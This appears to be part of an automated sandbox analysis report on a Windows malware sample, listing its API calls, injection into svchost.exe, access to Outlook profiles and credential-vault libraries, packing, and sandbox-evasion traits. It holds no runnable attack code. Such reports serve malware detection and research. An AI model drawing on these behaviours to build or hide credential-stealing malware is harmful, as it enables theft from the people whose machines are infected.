                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084A06A GetLastError,FormatMessageW,0_2_0084A06A
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008381CB AdjustTokenPrivileges,CloseHandle,0_2_008381CB
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008387E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0084B3FB
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0085EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0085EE0D
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0084C397
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007E4E89
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00DA3360
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00DA3360
                  Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeFile created: C:\Users\user\AppData\Local\Temp\autD30D.tmpJump to behavior
                  Source: TXzf0xX2uq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: svchost.exe, 00000001.00000003.1299000049.0000000004795000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: TXzf0xX2uq.exeReversingLabs: Detection: 79%
                  Source: TXzf0xX2uq.exeVirustotal: Detection: 71%
                  Source: unknownProcess created: C:\Users\user\Desktop\TXzf0xX2uq.exe "C:\Users\user\Desktop\TXzf0xX2uq.exe"
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TXzf0xX2uq.exe"
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TXzf0xX2uq.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: TXzf0xX2uq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: TXzf0xX2uq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: TXzf0xX2uq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: TXzf0xX2uq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: TXzf0xX2uq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: TXzf0xX2uq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: TXzf0xX2uq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: TXzf0xX2uq.exe, 00000000.00000003.1297140136.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1298538833.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TXzf0xX2uq.exe, 00000000.00000003.1297140136.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1298538833.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1371653634.0000000000DA1000.00000020.00000001.01000000.00000004.sdmp
                  Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.1371653634.0000000000DA1000.00000020.00000001.01000000.00000004.sdmp
                  Source: TXzf0xX2uq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: TXzf0xX2uq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: TXzf0xX2uq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: TXzf0xX2uq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: TXzf0xX2uq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Yara detected aPLib compressed binary
                  Source: Yara matchFile source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TXzf0xX2uq.exe PID: 8516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8532, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E4B37 LoadLibraryA,GetProcAddress,0_2_007E4B37
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00808945 push ecx; ret 0_2_00808958
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00DA3360
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007E48D7
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00865376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00865376
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00803187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00803187
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeAPI/Special instruction interceptor: Address: 12759FC
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: TXzf0xX2uq.exe, 00000000.00000003.1300265920.000000000127C000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1286685341.0000000001263000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000002.1305452902.000000000127C000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1287268623.000000000127C000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1288341819.000000000127C000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1287836983.000000000127C000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1286635411.0000000001253000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1288591675.000000000127C000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1289259767.000000000127C000.00000004.00000020.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1287574532.000000000127C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEE
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeAPI coverage: 4.9 %
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 8536Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0084445A
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084C6D1 FindFirstFileW,FindClose,0_2_0084C6D1
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0084C75C
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084EF95
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084F0F2
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084F3F3
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008437EF
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00843B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00843B12
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084BCBC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007E49A0
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
                  Source: svchost.exe, 00000001.00000002.1371461766.0000000000800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00853F09 BlockInput,0_2_00853F09
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007E3B3A
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00815A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00815A7C
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E4B37 LoadLibraryA,GetProcAddress,0_2_007E4B37
